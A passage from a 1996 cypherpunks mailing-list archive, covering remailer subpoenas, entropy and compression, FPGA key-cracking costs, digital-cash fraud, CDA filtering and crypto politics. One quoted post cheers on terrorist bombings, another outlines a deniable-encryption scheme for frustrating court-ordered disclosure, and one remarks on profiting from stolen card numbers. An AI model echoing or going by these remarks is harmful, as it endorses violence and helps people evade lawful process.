and silver and claimed that he wasn't selling anything, only changing 
denominations of Money, with no profits. He won the federal case; the IRS 
called their buds at the Tenn Dept of Revenue and had him indicted on a 
failure-to-remit-sales-tax charge. He was convicted on that by the Jury 
but he is appealing; meanwhile he only deals with out-of-Tenn people.

Which just goes to show that convictions/acquitals under a jury system 
have a lot of random-walk flavor. Further reference at the OJ Simpson 
newsgroups.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 10 Apr 1996 19:01:48 +0800
To: cypherpunks@toad.com
Subject: CoS supoenas records of all anonymous remailers? (Unverified)
In-Reply-To: <v02120d15ad90bdb89412@[206.15.66.107]>
Message-ID: <4lOlC8i00YUvAxX4Ar@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


[FWIW, Biased Journalism is a reasonably reputable source.  --Declan]

---------- Forwarded message begins here ----------

Date: Tue, 9 Apr 1996 18:27:02 -0700
To: fight-censorship+@andrew.cmu.edu, eric@remailer.net,
        farber@cis.upenn.edu (Dave Farber)
From: jwarren@well.com (Jim Warren)
Subject: (fwd fyi - NOT verified!!)  very urgent news

Seems like it's just a tad overbroad, if true.  Another example of, "all
the 'justice' that one can buy"?

--jim



>Date: Tue, 9 Apr 1996 15:44:52 -0700 (PDT)
>From: shelley thomson <sthomson@netcom.com>
>Subject: very urgent news
>To: jwarren@well.com
>
>Hello, Jim Warren:
>
>        The church of scientology plans to subpoena the records of every
>anonymous remailer in the USA.
>
>        I publish a news/black humor magazine on the net called **Biased
>Journalism**.  As a journalist I have covered the collision between the
>church of scientology and the net.  My last three issues have focused on
>legal action by the church against Grady Ward and Keith Henson.
>
>        Today I had a note from Grady Ward, whose deposition was finished
>today.  He said that they asked him a lot of questions about me, and
>warned me that they may issue a subpoena for me and a demand for my
>email.
>
>        The church presumably intends to claim that I am not a real
>journalist because I only publish on the net.  I need to prepare a legal
>defense, and needless to say, can't afford a lawyer.  If you can direct
>me to any resources, I would appreciate it very much.
>
>        On the basis of events today, Ward believes the church will
>issue subpoenas for the records of every anonymous remailer in the USA.
>
>        If these records are delivered to the church, our First Amendment
>rights go with them.
>
>        Shelley Thomson
>
>        publisher, **Biased Journalism**
>        800-731-0717 voice message
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Wed, 10 Apr 1996 18:47:37 +0800
To: Carl Ellison <cme@ACM.ORG>
Subject: Re: Disclosure of Public Knowledge to Foreigners
In-Reply-To: <v02140b0fad8f98cb0085@[168.143.8.144]>
Message-ID: <Pine.SV4.3.91.960409214927.10780F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I thought the framework for all ITAR considerations is - contract law. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Hilsenbeck <ahilsenb@cln.etc.bc.ca>
Date: Wed, 10 Apr 1996 23:05:21 +0800
To: Asgaard <asgaard@sos.sll.se>
Subject: Re: They're running scared.
In-Reply-To: <Pine.HPP.3.91.960409185501.7014B-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9604092240.B7784-0100000@cln>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 9 Apr 1996, Asgaard wrote:

> On Mon, 8 Apr 1996, Michael C. Peponis wrote:
> 
> > Personally, I love national insecurity such as terrorist attacks and 
> > random bombings, wish there were more of them by more people.
> 
> A big problem with random bombings is that one self can become part
> of the random targets.
> 
> Asgaard
> 
>>A bigger problem may be the fact that those doing the bombing are very 
often uneducated in their method. Either they are disappointed as their 
bombs die, or type with two fingers on one hand for the 
remainder of their frustrated lives
	Wildcat





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Wed, 10 Apr 1996 19:37:29 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <960409222650_372463464@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-08 21:04:26 EDT, Perry Metzger writes:

>Jon asked why it is that I contend that a compression algorithm won't
>in the general case even out the entropy of a semi-random stream.

I am not talking about any "general case," I proposed compressing spinner
data, which has sequences of repeating numbers interspersed with occasional
quasi-random fluctuations.  I am not saying that compression is a "magic
wand" that will fix data streams with a lot of "fake" entropy, such as the
RND() function available in many BASIC's, which I think most of us will agree
blows chunks.

>The answer can be obtained by simply trying to run gzip over an image,
>preferably one that hasn't been compressed. The results are, in
>general, very bad, even though images are highly compressable (even
>losslessly). I leave the why up as an exercise to the reader.

I have ZIPed the aforementioned spinner data with the built-in ZIP routines
in the PC Tools for Windows file manager.  Except for some very slight
banding (which appears to be caused by the ZIP headers) the noise sphere
plots look pretty good.  All files are available upon request for independent
verification.

>I have said before and I will say again that the only reliable way of
>dealing with a stream that has some amount of randomness mixed in with
>it that you wish to distil down into pure random bits is to use solid
>reasoning to figure out how many bits of entropy per unit of input you
>can actually expect to see, add a large fudge factor to cover your
>ass, and then distil down using a cryptographic hash.

I have no disagreements with this.  I merely proposed using the compression
function as a means of roughly estimating entropy and preventing the seeding
of the hash/PRNG with potentially "weak key" type data.

>Anything else
>makes me highly nervous. If you can't estimate the amount of entropy
>in an input stream from first principles, then you are probably in
>trouble and should seek an input stream that you have a better handle
>on.

Would anyone like to propose a means of measuring entropy that we can all
agree on?  I haven't seen anything yet that everyone likes.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 10 Apr 1996 20:23:11 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Bank transactions on Internet
In-Reply-To: <199604091732.KAA29261@netcom9.netcom.com>
Message-ID: <9604100239.AA12152@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> At 12:13 AM 4/9/96 -0700, Steve Reid wrote:
> >> Is it really that easy to break 40-bit? Don't you need access to a "fair
> >> amount of cpu power" to brute force crack 40bit? 
> >
> >I remember reading a recent paper at this URL:
> >  http://theory.lcs.mit.edu/~rivest/bsa-final-report.ascii
> >They mentioned a Field Programmable Gate Array (FPGA), specifically a
> >board-mounted AT&T Orca chip available for around $400. They said it could
> >crack a 40-bit key in 5 hours (average). Sounds like anyone with root
> >access on a major internet node could make a significant profit stealing
> >credit card numbers.
> >
> >The FPGA sounds like a very interesting device, with quite a few
> >legitimate uses... Has anyone out there seen one of these? 
> 
> I was hoping a hardware type would answer this question, and give
> references to manufacture's spec sheets, but not having seen such an
> answer, here is a software person's answer.

> 
> 
	As a hardware(and sometimes software) type who has used these sorts
of parts in real designs several things need be said.  

	First, the $400 cost is about what the physical chip and test
board would cost, it does not include the cost of the software packages
required to generate the programming information for the chip and
simulate and verify the design.   While this software can sometimes be
pirated or "borrowed" from an employer or school or even the chip
distributors, charges for a legitimate copy of the software for
programming many kinds of FPGA's can run in the low to mid thousands and
it it is usually dongle protected.

	And the more advanced software packages that take high level
descriptions of the logic in languages such as VHDL and compile them
into the special optimized forms required to get speed out of FPGAs with
highly assymetric routing delays through their interconnect networks are
considerably more expensive and may require RISC workstation hardware
(most of them ran only on Suns or HP in the past) and unix rather than
just a high end PC running Win 95.  Costs of this sort of software
package and workstation run as high as $50K per seat. 

	And it is rather unlikely that one could make a high clock speed
high performance hardware based key cracker work without traditional
high speed logic debugging tools such as a fast logic analyzer (if we
are talking 5-10 ns clock especially) and a 1 ghz or so digital scope.
These kinds of gear, though sometimes available after hours to engineers
working for more liberal companies or schools, cost many thousands
of dollars and are not garden variety items available to any hacker.

	And finally, depending on the technology of the part being
used, there may be a significant cost in the order of at least hundreds
if not thousands of dollars for a specialized programmer capable of
programming ("burning") the FPGA with the interconnect patterns generated
by the software.  These tend to either be specialized to one kind of
part and maybe modestly cheap (hundreds of dollars) or universal and
several thousands of dollars (such as DataIO gear).

	And at least in my experiance (I may be unusually stupid and
careless and clumsy or may not be) even if the parts are a few times
reprogrammable (as CMOS FPGAs often are these days) one can assume
that one will fry, or break the pins off, or reprogram one time too
many the FPGA or FPGA's before one gets the design working.  This
means that it would be realistic to assume several parts would be
consumed by the prototyping effort, they may not be cheap and this
adds up too.

	So whilst someone working with these parts as part of their job
or schooling might well have access to all the required resources on an
informal basis and be able to build a key cracker in evenings or
weekends for little more than the cost of the chip and a PC board to
hold it, it should be realistically noted that the actual cost of
equiping a lab from scratch with the required resources is more on the
order of tens to hundreds of thousands of dollars rather than $400.

	I must hasten to add that high density FPGAs have many many
legitimate uses in prototyping logic and producing products in small
volumes too small to justify the tooling costs of doing mask programmed 
gate arrays (which tend to be significantly faster and easier to design,
but cost $5-100K NRE to set up custom masks for fabrication). The
current generation of them make it possible to build logic systems in
one small chip that a few years ago would have been large  PC boards
full of PALs and other logic.

	Actually designing a workable key cracker for say RC-4 would be
a significant design challenge even with current parts, but probably not
something that someone skilled in the art (and of course reasonably
bright) couldn't handle.  (At first blush I think in the case of RC-4
the pipelined  key scheduling logic required would be the very hard
thing to make efficient).  And the availablity of simulation and timing
analysis tools would make the process of creating such a deamon largely
a software or logic programming exercise that could be mostly carried
out over weeks or months of effort on a workstation or high performance
PC, rather than something that  requires the intensive resources of an
extensive hardware lab for a long period.

	Unfortunately, like so many hacker projects these days, the cost
of reproducing multiple copies of a cracker and the skill level required
is very minimal compared to the real logic programming talent and
architectural insight it would take to fit one into a FPGA or two.
So once one is built, there can be hundreds or thousands of copies
made and put to work in the underground by all sorts of evil people who
wouldn't have a prayer of designing one from scratch,

						Dave Emery
						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <fotiii@crl.com>
Date: Wed, 10 Apr 1996 22:32:09 +0800
To: Alan Horowitz <cypherpunks@toad.com
Subject: Re: Bulletin: Cypherpunks say no taxes owed by moneychanger
Message-ID: <199604100422.AA21534@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain



I know Frankin and will see him next week.  His argument, which I 
have around here somewhere if I could get my paper life organized, 
realtes to gold and silver in certain situations.  If I find it I 
will reference it, otherwise I'll ask if he will post to this group.

FOT

> Date:          Tue, 9 Apr 1996 21:48:17 -0400 (EDT)
> From:          Alan Horowitz <alanh@mailhost.infi.net>
> To:            "Frank O. Trotter, III" <fotiii@crl.com>
> Cc:            cypherpunks@toad.com
> Subject:       Re: Bulletin: Cypherpunks say no taxes owed by moneychangers!

> > Date: Mon, 8 Apr 1996 22:43:55 -5
> > From: Frank O. Trotter, III <fotiii@crl.com>
> > Aside from ecash, helping people to exchange currency is my day job
> > so I see this all the time, especially this month each year.
> 
>   There is a guy in Tennessee who publishes a newsletter called _The 
> Moneychanger_.  He is one of those Constitutionalists. He did put himself 
> through hell to get acquited of an IRS charge - he is a dealer in gold 
> and silver and claimed that he wasn't selling anything, only changing 
> denominations of Money, with no profits. He won the federal case; the IRS 
> called their buds at the Tenn Dept of Revenue and had him indicted on a 
> failure-to-remit-sales-tax charge. He was convicted on that by the Jury 
> but he is appealing; meanwhile he only deals with out-of-Tenn people.
> 
> Which just goes to show that convictions/acquitals under a jury system 
> have a lot of random-walk flavor. Further reference at the OJ Simpson 
> newsgroups.
> 
> 
Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Wed, 10 Apr 1996 18:38:51 +0800
To: cypherpunks@toad.com
Subject: onyma
Message-ID: <199604100105.DAA09113@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

>Not meant to be snide, even if sounded that way. I just get confused by
>your various nyms

The term `nym' is erroneus: The Greek words are an-onym, pseud-onym,
syn-onym, hom-onym pp, derived from `onyma', name.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@nowhere (Senator Exon)
Date: Wed, 10 Apr 1996 18:55:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604100152.DAA25396@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain




Borrowing inspiration from May, a page from Scheier and some code from Gutman...

Hard disk space being cheap now, Bob creates several distinct disk partitions and uses Peter Gutman's Secure File System, or equivalent, to encrypt all of them.  First, Bob fills all of them with innocous data. Next, Bob writes one or more partition with secrets.  Bob arranges that no one knows the pass phrases for some of the innocous partitions by luring the cat across the keyboard or having his six year old punch something in while he is out of the room.  Bob carefully and publically documents the fact that he did this without indicating which partitions
and how many partitions are actually useful.  In addition to regularly using the secret partitions, Bob periodically updates the innocous partitions, who's pass phrases he does know, with more uninteresting but contemporary data.

When ordered to do so, Bob could reveal the pass phrases to the
innocuous data and to as much of the secret data as he felt necessary. Bob could not be forced to reveal all of the pass phrases as he does not know all of them.  Naturally, the disk encryption routines would not store pass phrases but only a validating hash, that even Bob could not reproduce for all of the partitions.

Practically, Bob cannot be forced to reveal the pass phrases to any alleged remaining secret data, since this might not exist.  To further encourage this belief Bob might associate innocous data with a first pass phrase, mildly embarrasing data with a second, and so on, and then, after revealing the first, gradually allow himself to be be coaxed into revealing the second and disclose a third only after the rubber hoses came out.

Since all of the partitions have similar content, no statistic should reveal which is which.  Bob might have a bit refresher routine periodically nibble read and rewrite the whole disk so that no electronic characteristic exists that reveals record age.

No doubt, a judge might whimsically keep Bob in jail for a while, trying to assure that he has revealed all of the pass phrases, but the judge can never be certain, even when Bob has disclosed everything.  This situation creates doubt that Bob is in contempt, even when he is, and makes a prison term relatively pointless, unless for revenge.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 11 Apr 1996 01:08:32 +0800
To: cypherpunks@toad.com
Subject: Re: Tense visions of future imperfect
Message-ID: <199604091857.LAA06933@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Financial Times, April 9, 1996, p. 13.
>
>
>   Tense visions of future imperfect
>
>   Victoria Griffith eavesdrops on writers at a conference
>   about privacy and the Net
>
>...
>
>   Martha's Vineyard-based author Simson Garfinkel, for
>   instance, came up with a few terrifying scenarios about Net
>   crime for a discussion group with David Chaum, the founder
>   of the electronic money group DigiCash. In one, a thief
>   went on an electronic spending spree with stolen digital
>   cash. In another, an elderly woman was electronically
>   robbed of her life savings. In the third, the stability of
>   the US economy was at stake.
>
>   Garfinkel described it like this: "My name is Agent
>   Jenkins. I'm an investigator with the secret service,
>   working on a counterfeiting case. And it's tough. Last
>   year, my office got a priority call from an economist at
>   Stanford. The economist was looking at something called the
>   money supply and velocity and both were increasing a little
>   too fast. They just didn't add up. The economist finally
>   figured an organisation was printing its own electronic
>   money -- just like the US government does.
>
>   "This counterfeit currency looked just like the real thing,
>   except it was a fraud. She even found some of it -- a
>   digital dollar that was signed and sealed by the US
>   government's secret key, yet had a serial number that had
>   never been issued. The money that was being made was on the
>   Net. It was everywhere and nowhere. And it was encrypted,
>   so that we wouldn't even know it if we found it. Last
>   month, we estimate, the total fraud was up to $900,000 a
>   month, and it is increasing still."

I don't see how this third scam would work in a system such as DigiCash
which uses online clearing.  Unissued serial numbers would be refused when
presented for clearing.

One scenario which would work (and could be used for scams 1 and 2) is
either stealing digital cash, or counterfeiting issued, but unredeemed
serial numbers.  In either case, if you spend it before the rightful owner
does, that rightful owner gets, as a minimum, a lot of hassle, and might
lose the cash.  If this kind of scam, particularly the counterfeiting scam,
occurs too often, public trust in the cash will disappear, and people will
refuse to buy it.

Note that people trying to maintain anonymity are particularly vulnerable
since they have to hold cash for a period of time to defeat traffic
analysis attacks.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Marner <dmarner@mis.nu.edu>
Date: Sun, 14 Apr 1996 03:45:57 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <8lOUXbq00YUvBYs3cV@andrew.cmu.edu>
Message-ID: <199604091820.SAA24783@mis.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain



There are more details about Livingston's Exon Box (they call it
ChoiceNet) available at
http://www.livingston.com/Marketing/Press/choicenet_press.html .

My kneejerk reaction was to hate this thing too, but now I'm not so
sure. If I was responsible for the Internet connectivity for a K-12
school system, I would want this capability in a big way. 

I see the Livingston product as an enabling technology. The obvious
associated risk is Big Brother deciding, "If one router CAN do it, then
every router MUST do it!" The idea of having a Naughty_Enabled Bit in
IPv6 is, of course, even worse; but I'm glad it isn't my job to
exlpain why it is horrid to a Federal judge. 

Dan

On Tue, 9 Apr 1996 02:51:19 -0400 (EDT)  "Declan B. McCullagh" wrote:

[ SNIP ]
>  Enforcing the CDA Improperly May Pervert Internet Architecture
>  
>   by David P. Reed
[ SNIP ]   
>   I just read in Inter@ctive Week (March 25, 1996) that Livingston plans
>   to announce an "Exon box" - a router that is designed to enable ISPs
>   to restrict access to "indecent sites" or unrated sites unless an
>   "adult" enters an authorization code when opening a session to enable
>   the router to transmit packets to the site.

--
Dan Marner                             dmarner@mis.nu.edu
Network Weasel
National University                    "Not on MY network!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Thu, 11 Apr 1996 00:11:26 +0800
To: pfarrell@netcom.com
Subject: DC-area cypherpunks physical meeting with Saturday
Message-ID: <199604091907.MAA17825@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As advertised, the next DCCP meeting will be this weekend, April 13, 
at 3:00 at Digex. see http://www.isse.gmu.edu/~pfarrell/dccp/ for
a tiny bit more info. As usual, topics and speakers welcome.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 11 Apr 1996 02:58:14 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <316AA1FC.6ED1@vail.tivoli.com>
Message-ID: <199604091805.OAA01959@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
>Scott Brickner wrote:
>> Given your position, io.com is only accessible to adults in the world
>> of the CDA advocates.  Just upgrade your IP software to refuse
>> connections from minors.
>
>It's not "my" IP software.  I pay io for an account.  What you're saying
>is that every ISP would have to decide whether to be completely G-rated
>or else open to anybody.

Not necessarily.  The ISP could provide a configuration mechanism for
"self ratings" which the IP software would recognize.  Mislabeling would
be punishable the same way showing nekkid pictures of your wife to your
neighbor's kid is.

>Sigh.  That's probably what the CDA crowd wants.  It's hard not to become
>consumed by hatred.

Too true.  I wish they'd grow up and realize that information is inherently
harmless.  "Sticks and stones may break my bones..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Apr 1996 00:21:34 +0800
To: Mike McNally <declan+@CMU.EDU>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <2.2.32.19960409175739.00764464@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:09 AM 4/9/96 -0500, Mike McNally wrote:

>I sent a letter to the Economist last year pointing this out after reading
>an article containing the offhand statement, "... and of course it is
>entirely feasible to control Internet content" (or something like that).
>I don't have those magic two letters at the front of my name though.  It
>seems so utterly obvious.  When you connect to an ISP via PPP or SLIP,
>all the ISP is doing is routing packets. 

Or as I said in my letter to the Economist on their article "Censoring
Cyberspace:"

*******************

You suggest that Internet Service Providers might be required to employ 
"stop lists" supplied by their national censors to block objectionable 
material.  The current focus is on banning smut.  But no doubt many 
nations will want to ban various political and religious views as well. 
 
Surely, you know that anyone with a direct (TCP/IP) connection to the 
Internet (all Windows95 owners, for example) is not dependent on service 
providers for anything beyond a physical connection.  Everyone who has 
such a local dial-in account is able to link to any site in the world at 
no additional cost.  No long distance phone calls are necessary.   

*********************

A lot of people who know nothing of the nets think that they can be
controlled "like magzines and newspapers" in the words of a Bell Atlantic
exec.  Like the Bavarian prosector, they will learn.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Apr 1996 01:03:21 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
In-Reply-To: <199604091714.KAA27317@netcom9.netcom.com>
Message-ID: <199604091838.OAA02349@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> One of the migration paths suggested for IPV4 to IPV6 migration is to
> tunnel IPV4 packets within IPV6 packets.  IPV4 packets do not provide for
> an adult/minor tag, so until the transition to IPV6 is fairly well along,
> this approach will be ineffective.

Neither, for that matter, do IPv6 packets -- there is no provision for
them. Furthermore, were anyone to create an end to end header of that
sort, it would be eight bytes of wasted space in every packet in the
net, especially since the implementation of such a tag is a technical
impossibility as there is no way to force the originating system to
tell the truth.

The internet and the culture are coming into conflict in a big way,
and I don't believe that both of them can survive.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Thu, 11 Apr 1996 07:47:06 +0800
To: "Brian C. Lane" <blane@aa.net>
Subject: Re: WWW User authentication
In-Reply-To: <31676b78.52447450@mail.aa.net>
Message-ID: <Pine.BSI.3.91.960409181051.8349Q-100000@newton.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


Right now, the only solution I know of is to use cookies for browsers that
support them, and do all the MD5-ing yourself. That excludes some browsers,
but you can support those in the totally insecure manner.

On Tue, 9 Apr 1996, Brian C. Lane wrote:

> 
>   I just finished writing a cgi script to allow users to change their login
> passwords via a webpage. I currently have the webpage being authenticated
> with the basic option (uuencoded plaintext). MD5 would be nicer, but how
> many browsers actually support it?
> 
>   When the user changes their password, the form sends their name, old
> password, and new password with it, in the clear. This is no worse than
> changing your password across a telnet connection, but I'd like it to be
> more secure, but useable by a large number of browsers.
> 
>   Any advice?
> 
>     Brian
> 
> ------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
>   Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
> ==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============
> 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 11 Apr 1996 01:08:37 +0800
To: cypherpunks@toad.com
Subject: RISKS: Social Security (sic) Administration fraud
Message-ID: <v01540b00ad90ceb34f24@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------

Date: Sun, 7 Apr 1996 22:12:30 -0500 (CDT)
From: Sean Reifschneider <jafo@tummy.com>
Subject: The weakest link: Social (In)security Administration

The URL "http://www.nando.net/newsroom/ntn/info/040696/info5_14984.html"
reports "one of the biggest breaches of security of personal data held
by the federal government".  Apparently several employees of the Social
Security Administration sold information including  SSNs and mother's
maiden names of more than 11,000 people to a credit-card fraud ring.

The fraud ring was able to use this information to activate cards which
were stolen from the mail.  Citibank had implemented a scheme which
required customers to "activate" their credit cards when they receive
them by calling a phone number and providing personal information like
their mothers maiden name.

It seems that while systems are being designed to protect our property, it's
just causing the crime to move closer to the person.  If someone steals your
credit card from the mail or your car from the parking lot, you're probably
at a safe distance.  Instead, they are forced to carjack your car at a
stoplight because of your alarm system, or find out personal information
about you.

Similarly, I heard about home breakins on alarmed houses in which the
burglar would regularly trigger the alarm and be careful to leave no
traces.  Once the police stopped coming (because the alarm was faulty),
they were free to break in and swipe whatever they like.

No matter how secure the system, the weakest link can be the clerk who's
paid $12K/year to work on the system.  It doesn't take much money to
convince this person to hand out our personal information.

This sort of thing kind of makes the hassle I went through in keeping my
SSN from my insurance company.  If you've never tried it, for me it was
a huge hassle...  Apparently, all of my claims needed to be handled by
hand by one of the supervisors.  Of course, if everyone did it, their
$4/hour clerks could take care of it.

Sean Reifschneider, Inimitably Superfluous <jafo@tummy.com>
URL: <http://www.tummy.com/xvscan>  HP-UX/Linux/FreeBSD X11 scanning software.

    [Also noted by Monty Solomon <monty@roscom.COM> quoting from Edupage,
    and WOODWARD@BINAH.CC.BRANDEIS.EDU (Beverly Woodward), who cited the
    article in "U.S. Workers Stole Data on 11,000, Agency Says" in
    *The New York Times*, 06 Apr 1996, p. 6, from which most other
    reports seem to have been drawn.  PGN]


-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 11 Apr 1996 00:31:32 +0800
To: jim bell <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199604100206.TAA19148@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:21 PM 4/9/96 -0800, jim bell wrote:
>And the rest of us are tired of seeing those non-responses!

I wish to state that Jim Bell does not speak for me.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 11 Apr 1996 01:06:50 +0800
To: cypherpunks@toad.com
Subject: Watch your language, Shabbir.
Message-ID: <m0u6qZK-0008y1C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


When the Leahy bill was proposed, BTW was one of the organizations that came out in favor of it.  Despite later substantial criticism and direct contacts, Mr. Safdar never defended his original position on this bill against these objections.  I just saw something which may explain  a bit about VTW's positions:


                               VTW BillWatch #41

       VTW BillWatch: A weekly newsletter tracking US Federal legislation
     affecting civil liberties.  BillWatch is published at the end of every
        week as long as Congress is in session. (Congress is in session)
                   BillWatch is produced and published by the
                 Voters Telecommunications Watch (vtw@vtw.org)
                             (We're not the EFF :-)
                 Issue #41, Date: Wed Apr  3 12:41:46 EST 1996
     Do not remove this banner.  See distribution instructions at the end.
___________________________________________________________________________
TABLE OF CONTENTS
        Introduction from the Editor (Steven Cherry)
        A tragic story about a wiretap (Shabbir J. Safdar)
 [stuff deleted]

A TRAGIC STORY ABOUT A WIRETAP
by Shabbir J. Safdar, VTW Board (New York, NY)

This week most of VTW's staff attended the Computers, Freedom, and Privacy
conference in Cambridge Massachusetts.  I go to the conference every
year to recharge my batteries, put names to faces, and enjoy the synergy that
can only come with face-to-face dialogue.
[stuff deleted]
One, while wiretaps have probably been effective in other cases, they
were not effective in this one.  While we can grant law enforcement the
benefit of the doubt in other cases, the existence of this one shows
that a wiretap is not the "silver bullet" of law enforcement that we
have been led to believe.

Another observation that can be made is that this parallels the key
escrow debate very closely.  No reasonable person is objecting to the
FBI's right to conduct a wiretap.  However what is being debated is the
extent to which individuals and law enforcement can go to accomplish
their duties.  The Clinton Administration is striving for a world where
everyone is forced to speak in a form of encryption that is easily decoded
by law enforcement.  The public and industry is striving for a world where
they continue to have private conversations.
[end of quote]

Look, very carefully, at the last paragraph quoted above.  Mr. Safdar says, 
"No reasonable person is objecting to the FBI's right to conduct a wiretap."

Huh?  "FBI's right"????  Maybe this is a bit too basic for comprehension, 
but governments have no "rights" by any definition I've ever heard.  
"Rights" are the possessions of individuals, and occasionally individuals 
authorize governments to do things.  But that does not mean that those 
governments possess a "right," especially not one on such a flimsy and 
transitory principles as wiretaps.  Government certainly does not possess a 
"right" that supercedes the wishes of the public, or the Constitution.

Safdar's note appears to pre-date my commentary where I pointed out that 
before 1968, wiretaps in America were illegal, but were done anyway simply 
because the cops wanted to.  That doesn't sound like a "right," now, does 
it?  If it were a "right" then it couldn't be given by law, or taken away by 
law.  But nobody I've ever  met claims that the cops aren't at least legally 
obligated to follow the law, whether or not they actually do.

I don't like sloppy rhetoric.  Even worse, claiming that "no reasonable 
person" would object to a non-existent "right" is truly outrageous. I know 
_plenty_ of people  who would claim that the government, and by extension 
the FBI, possesses no "right" to do wiretaps (this position would be echoed 
by essentially every libertarian). I know many people who think that the 
government shouldn't be able to do wiretaps at all. 

VTW's header above claims "We're not the EFF," but it's hard to tell this 
from Mr. Safdar's propaganda.  Now I understand why he didn't defend his 
position on the Leahy bill against criticism.  VTW is sounding more and more 
like "EFF" all the time.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 11 Apr 1996 02:21:03 +0800
To: cypherpunks@toad.com
